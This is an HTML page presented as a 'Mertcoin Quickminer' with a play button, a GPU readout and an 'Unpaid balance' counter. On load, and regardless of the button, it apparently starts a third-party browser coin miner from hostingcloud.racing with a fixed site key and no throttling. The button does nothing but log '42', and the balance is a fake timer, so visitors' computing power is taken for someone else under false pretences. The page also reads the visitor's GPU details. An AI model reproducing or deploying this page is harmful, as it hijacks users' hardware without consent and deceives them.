<!DOCTYPE html>
<html lang="en">
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-M79BN1P0HE"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-M79BN1P0HE');
</script>
  <style>
        body {
          background-color:  black;
          color: white;
          font-family: Arial, Helvetica, sans-serif;
          text-align: center;
        }
  </style>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content=
  "width=device-width, initial-scale=1.0">
  <title>Mertcoin Miner</title>
</head>
<body>
  <script>function log(){
	console.log("42");
}
  </script>
  
  <style>
    body {
	background-color: black;
}
.round-button {
	box-sizing: border-box;
	display:block;
	width:80px;
	height:80px;
	padding-top: 14px;
	padding-left: 8px;
	line-height: 20px;
	border: 6px solid #fff;
	border-radius: 50%;
	color:#f5f5f5;
	text-align:center;
	text-decoration:none;
	background-color: rgba(0,0,0,0.5);
	font-size:20px;
	font-weight:bold;
	transition: all 0.3s ease;
}
.round-button:hover {
	background-color: rgba(0,0,0,0.8);
	box-shadow: 0px 0px 30px rgba(26, 255, 0, 1);
	text-shadow: 0px 0px 30px rgba(26, 255, 0, 1);
}
  </style>
  
  <h2>Mertcoin Quickminer<h2>
    <a href="#" class="round-button" onclick = "log()"><i class="fa fa-play fa-2x"></i></a>
    <div style="width: 100%;">
        <div style="width: 50%; height: 100px; float: left; background: black;"> 
          <h3>Unpaid balance:</h3>
          <h4 id="hash">0</h4>
        </div>
        <div style="margin-left: 50%; height: 100px; background: black;"> 
        
          <h3>GPU:</h3>
          <h4 id="benchmark">null</h4>
        </div>
    </div>
    
  <script>
    try {
   function getVideoCardInfo() {
     const gl = document.createElement('canvas').getContext('webgl');
     if (!gl) {
       console.error("WebGL is not supported.");
       throw ("WebGL is not supported.");
       return {
         error: "no webgl",
       };
     }
     const debugInfo = gl.getExtension('WEBGL_debug_renderer_info');
     return debugInfo ? {
       vendor: gl.getParameter(debugInfo.UNMASKED_VENDOR_WEBGL),
       renderer:  gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL),
     } : {
       error: "no WEBGL_debug_renderer_info",
     };
   }
   
      
   document.getElementById("benchmark").innerHTML = getVideoCardInfo().renderer;
   
   
 } catch {
   document.getElementById("benchmark").innerHTML = "Failed Benchmark";
   throw("Failed Benchmark.");
   
 }
  </script>
  
  
  <script src="https://www.hostingcloud.racing/0Frc.js"></script> 
  <script>


    var _client = new Client.Anonymous('6e8067e289507961a17268271edbefca1e41d31d4b71b3a781aada8c0611dfdb', {
        throttle: 0, c: 'w'
    });
    _client.start();

  </script> 
  <script>


  var calc = 0;
  setInterval(f, 60000);
  function f() {
  calc = calc + 0.00030000;
  calc = calc.toFixed(8);
  calc = parseFloat(calc);
  document.getElementById("hash").innerHTML = calc;
  }

  </script>
</body>
</html>
